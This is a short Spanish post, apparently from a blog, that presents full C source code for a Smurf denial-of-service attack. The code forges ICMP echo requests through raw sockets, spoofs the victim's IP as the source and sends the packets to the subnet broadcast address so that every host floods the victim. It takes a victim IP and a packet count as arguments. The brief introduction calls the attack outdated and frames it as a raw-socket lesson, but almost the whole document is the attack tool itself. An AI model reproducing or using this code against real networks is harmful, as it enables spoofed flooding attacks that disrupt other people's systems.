Aunque hoy en día este ataque de DoS está en desuso, ilustra el uso de raw sockets para construir un paquete modificado spoofeando la IP de origen.

/******************************************************************* Autor: skarvin e-mail: skarvin@gmail.com Este ataque realiza un ping con la ip de la victima a la direccion ip de broadcast de su misma subred, con lo cual todos los ordenadores de la red responderan a la víctima ********************************************************************/ #include <stdlib.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <net/ethernet.h> #include <stdio.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <sys/time.h> #include <malloc.h> #include <ctype.h> #include <net/if.h> #include <sys/ioctl.h> #include <fcntl.h> u_long get_ipbcast(char *); unsigned short in_cksum(unsigned short * , int ); int send_icmp_packet(unsigned long , unsigned long , char * , int, int); int main(int argc, char **argv){ struct in_addr in_s,in_d;/*source,dest*/ char ip[28]; int n_pkts; if(argc != 3){ printf("usage: %s victima num_pkts\n",argv[0]); exit(EXIT_FAILURE); } /*procedemos a verificar la ip introducida*/ if(inet_addr(argv[1])==INADDR_NONE){ printf("Dirección IP incorrecta!"); exit(EXIT_FAILURE); } in_d.s_addr = get_ipbcast("eth0"); strcpy(ip,(char *)inet_ntoa(in_d)); n_pkts=atoi(argv[2]); inet_aton(argv[1], &in_s); printf("Enviando %d paquetes a la dirección de broadcast %s desde %s\n\n",n_pkts,ip,argv[1]); /*enviamos los paquetes con solicitud de eco a la ip de broadcast*/ for(;n_pkts>0;n_pkts--) send_icmp_packet(in_d.s_addr,in_s.s_addr," ",sizeof(" "), ICMP_ECHO); } u_long get_ipbcast(char *iface) { /*Esta función devuelve la dirección de broadcast de la ip*/ int sd; struct ifreq ifr; struct in_addr inaddr; if((sd=socket(AF_INET,SOCK_DGRAM,0))<0) { perror("socket"); return 0; } bcopy(iface,ifr.ifr_name,IFNAMSIZ); if(ioctl(sd,SIOCGIFBRDADDR,&ifr)<0) { perror("ioctl(SIOCGIFADDR)"); return 0; } bcopy(&ifr.ifr_broadaddr.sa_data[2],&inaddr,sizeof(struct in_addr)); close(sd); return inaddr.s_addr; } int send_icmp_packet(unsigned long dst_ip, unsigned long src_ip, char * data, int data_size ,int icmp_type){ /* socket */ int sock; /* Longitud de un paquete ICMP */ unsigned int buffer_size = sizeof(struct iphdr) + sizeof(struct icmphdr) + data_size; /* Paquete capaz con capacidad para un paquete ICMP */ unsigned char buffer[buffer_size]; memset(buffer, 0, buffer_size); /* Cabecera IP */ struct iphdr *ip = (struct iphdr *)buffer; /* Cabecera ICMP */ struct icmphdr *icmp = (struct icmphdr *)(buffer + sizeof(struct iphdr)); /* Datos */ char *p_data = (buffer + sizeof(struct iphdr) + sizeof(struct icmphdr)); mempcpy (p_data, data, data_size); /* Creación del socket */ if ((sock = socket(AF_INET,SOCK_RAW,IPPROTO_ICMP)) == -1) { perror("socket()"); exit(EXIT_FAILURE); } /* Establece las opciones del socket */ int o = 1; if( setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&o,sizeof(o)) == -1 ) { perror("setsockopt()"); exit(EXIT_FAILURE); } /* Rellena la cabecera IP */ ip->version = 4; ip->ihl = 5; ip->id = htons(1234); ip->saddr = src_ip; ip->daddr = dst_ip; ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->tot_len = buffer_size; ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr)); /* Rellena la cabecera ICMP */ icmp->type = icmp_type; icmp->code = 0; icmp->checksum = in_cksum((u_short *)icmp, sizeof(struct icmphdr)+data_size);; /* Rellena la estructura sockaddr_in */ struct sockaddr_in addr; addr.sin_family = AF_INET; /* Envío del paquete */ if ((sendto(sock, buffer, buffer_size, 0, (struct sockaddr*)&addr, sizeof(struct sockaddr_in))) == -1 ) { perror("send()"); exit(EXIT_FAILURE); } } /*Funcion que calcula el checksum de un paquete Código obrenido de http://www.w00w00.org/files/misc/spoof.c*/ unsigned short in_cksum(unsigned short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); }